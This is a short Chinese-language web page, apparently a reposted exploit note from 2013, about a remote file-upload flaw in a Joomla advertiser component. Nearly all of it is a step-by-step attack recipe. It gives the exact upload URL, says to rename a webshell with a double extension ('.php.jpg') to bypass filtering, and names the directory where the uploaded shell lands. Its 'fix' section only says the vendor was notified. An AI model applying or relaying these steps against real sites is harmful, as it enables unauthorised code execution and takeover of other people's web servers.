• 选择风格
  • 加入收藏
  • 繁體中文
  • 网站地图
    • 当前位置:首页 >> 网络通讯 >> 网络安全 >> 内容

    Joomla远程上传漏洞 可直接getshell

    时间:2013/4/19 12:09:00 作者:平凡之路 来源:xuhantao.com 浏览:

    作者:1337
     
    1.  有些joomal需要先注册.
     
    ?option=com_user&view=login
     
    2.  到上传地址
     
    /index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
     
    3.  点击image后点击upload,选择shell, 将shell重名为adm1n.php.jpg格式.
     
    4.  上传后的文件在/ images/ksadvertiser/U0 这个目录下.
     

     
    Demo:

    修复:
    已通知官方 ,涛涛电脑知识网,涛涛电脑知识网

  • 上一篇:315爱购程序任意文件源码查看
  • 下一篇:wordpress暴路径 影响所有版本
    • 相关文章
    • 没有相关文章
    共有评论 0相关评论
    发表我的评论
    • 大名:
    • 内容:
  • 徐汉涛(www.xuhantao.com) © 2024 版权所有 All Rights Reserved.
  • 部分内容来自网络,如有侵权请联系站长尽快处理 站长QQ:965898558(广告及站内业务受理) 网站备案号:蒙ICP备15000590号-1